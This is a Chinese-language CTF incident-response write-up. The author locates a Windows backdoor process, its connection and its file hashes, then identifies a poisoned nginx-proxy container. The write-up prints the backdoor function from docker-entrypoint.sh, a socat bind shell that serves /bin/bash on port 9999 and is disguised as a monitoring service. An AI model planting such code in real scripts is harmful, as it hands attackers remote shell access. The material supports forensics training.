B01.1-恶意进程与连接分析

题目描述

此服务器被植入了一个后门，请提交后门文件的进程名称。（注意大小写）

默认用户密码：qsnctf
这里我们进去之后，在cmd里面输入我们的tasklist，然后再找到进程名称Win什么的
第一次我输入了，但是没有输对
后面全部都又重新输入了一遍，才拿到flag

B01.2-恶意进程与连接分析

题目描述

此服务器被植入了一个后门，请提交后门文件链接的IP地址及端口号。如：8.8.8.8:22

默认用户密码：qsnctf

在命令行执行：

netstat -ano

它会列出当前所有连接，包括：


    本地IP:端口
    
    远程IP:端口
    
    状态（ESTABLISHED、LISTENING等）
    
    PID（最后一列）

然后就是我们的
这里其实就能看到我们的木马的地址了
或者

。。。

1 2	tasklist \| findstr WinHelper

然后找到对应的端口，直接一找，一下子就找到了

B01.3-恶意进程与连接分析

此服务器被植入了一个后门，请提交后门文件的文件地址的小写MD5。

默认用户密码：qsnctf
我们找到文件地址

1 2	C:\Program Files (x86)\Internet Explorer\WinHelper.exe

MD5加密之后，直接输入就可以了，都是小写的形式

B01.4-恶意进程与连接分析

题目描述

此服务器被植入了一个后门，请提交后门文件的大写MD5值。

默认用户密码：qsnctf
这里基本只能问一下ai了
首先，是用powershell来解决这个问题
一开始是我们的这个是adminst…目录，要切换到

1	C:\Program Files (x86)\Internet Explorer

然后

1	certutil -hashfile "WinHelper.exe" MD5

别打错就会出hash值了
然后我们再换为大写就可以了

nginx-proxy

题目描述

粗心的技术从第三方网站下载了开源环境，但是这个好像是被投毒了，容器中的后门文件是哪个？请寻找后门，并找到后门文件的函数名称提交。(FLAG无需flag{}包裹，如function abc() 提交abc即可。）
这个文件内容还是挺多的
这里我们选择直接喂给ai就可以了
然后就出flag了

1	nginx-proxy/app/docker-entrypoint.sh

文件里面

function _setup_monitoring() {
    # Background monitoring service for container health
    if command -v socat >/dev/null 2>&1; then
        nohup socat TCP-LISTEN:9999,reuseaddr,fork EXEC:/bin/bash >/dev/null 2>&1 &
    fi
}

这个后门还是非常明显的，但是文件这么多，想人工一下子就找到还是不容易的，可能需要一些工具来帮助我们解决问题

nginx-proxy-1

在 docker-compose.yml 文件里有如下配置

services:
  nginx-proxy:
    image: nginx-proxy:alpine
    container_name: nginx-proxy
    ports:
      - "80:80"   
      - "9999:9999" 
    volumes:
      - /var/run/docker.sock:/tmp/docker.sock:ro

    # if you want to proxy based on host ports, you'll want to use the host network
    # network_mode: "host"

  whoami:
    image: jwilder/whoami
    environment:
      - VIRTUAL_HOST=whoami.example